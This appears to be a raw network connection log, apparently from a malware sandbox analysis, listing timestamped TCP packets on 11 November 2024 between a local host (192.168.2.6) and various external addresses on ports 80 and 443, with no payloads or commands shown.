                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.809858084 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.835700035 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.835814953 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.835828066 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.835864067 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.835915089 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836015940 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836196899 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836208105 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836234093 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836262941 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836483955 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836596012 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836638927 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836726904 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836764097 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836771011 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836782932 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836808920 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.836817980 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.837208033 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.840941906 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.867964029 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868010044 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868104935 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868119955 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868163109 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868201971 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868236065 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868242025 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868280888 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868653059 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868694067 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868696928 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868705034 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.868772984 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.869137049 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.869170904 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.869206905 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.869211912 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.869241953 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.950870037 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.950933933 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.950958967 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.950979948 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951000929 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951024055 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951075077 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951096058 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951096058 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951096058 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951107025 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951121092 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951144934 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951148987 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951179981 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951647997 CET8050215154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951695919 CET5021580192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951981068 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.952017069 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.952022076 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.952059031 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.952450991 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.952980995 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.953003883 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.953022003 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.953023911 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.953032970 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.953046083 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.953074932 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.953682899 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.954019070 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.954040051 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.954060078 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.954066038 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.954076052 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.954102039 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311198950 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311255932 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311258078 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311269045 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311285973 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311299086 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311309099 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311319113 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311337948 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311369896 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311914921 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311943054 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311954021 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311959028 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.311981916 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.312000990 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.312894106 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.312916040 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.312968016 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.312973022 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.313009024 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.313743114 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.313786030 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.314626932 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.314692020 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315546989 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315571070 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315608978 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315613985 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315642118 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315660954 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.316436052 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.316498995 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.317346096 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.317399979 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.318017006 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.318078041 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.318082094 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.318115950 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.318239927 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.409945011 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410015106 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410031080 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410075903 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410114050 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410211086 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410372972 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410386086 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410398960 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410409927 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410415888 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410423040 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410432100 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410448074 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410463095 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410844088 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410856009 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410895109 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.414930105 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.415009975 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.415019035 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.415030003 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.415049076 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.415069103 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491177082 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491225958 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491246939 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491260052 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491276979 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491295099 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491514921 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491527081 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491548061 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491565943 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491758108 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491770029 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491790056 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491807938 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492080927 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492091894 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492104053 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492119074 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492147923 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492409945 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492445946 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492571115 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492585897 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492603064 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492639065 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492862940 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492873907 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492893934 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492913008 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493061066 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493134022 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493221998 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493232965 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493252039 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493268967 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493520021 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493530989 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493542910 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493558884 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493587971 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493967056 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.494004011 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.494158983 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.494193077 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536665916 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536695004 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536706924 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536725998 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536758900 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536890030 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536927938 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.544039965 CET5214580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.548118114 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.548147917 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.548996925 CET805214544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.551872969 CET5215080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.552578926 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.552613974 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.552634954 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.552660942 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.553061962 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.553080082 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.553464890 CET5214780192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.556720018 CET805215044.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.558255911 CET80521473.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.589891911 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.589946032 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.595668077 CET5212180192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.598285913 CET5022680192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.600440979 CET805212144.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.601330996 CET5212280192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.601587057 CET5212280192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.602781057 CET5022780192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.602978945 CET5022880192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.603178978 CET805022618.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.603332996 CET5022680192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.603477955 CET5022680192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.607605934 CET8050227154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.607656956 CET5022780192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.607768059 CET8050228199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.607810974 CET5022880192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.608225107 CET805022618.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.620594978 CET5022880192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.625365973 CET8050228199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.625415087 CET5022780192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.630270958 CET8050227154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.637952089 CET5212880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.638961077 CET5212380192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.643511057 CET8052128188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.644624949 CET8052123208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.742697954 CET8052123208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.742762089 CET5212380192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.007024050 CET8052128188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.007061958 CET5212880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.028491974 CET805022618.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.028634071 CET5022680192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.035465002 CET805022618.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.035550117 CET5022680192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169269085 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169282913 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169296026 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169369936 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169369936 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169382095 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169498920 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169543028 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169605970 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169617891 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169629097 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169640064 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169642925 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169642925 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169692993 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.170239925 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.170332909 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.174195051 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.174269915 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.174329042 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.174343109 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.174384117 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.174384117 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.250477076 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.250511885 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.250524998 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.250539064 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.250562906 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.250722885 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.250735044 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.250755072 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.250755072 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.250864983 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251014948 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251108885 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251117945 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251280069 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251319885 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251319885 CET5021780192.168.2.6199.191.50.83
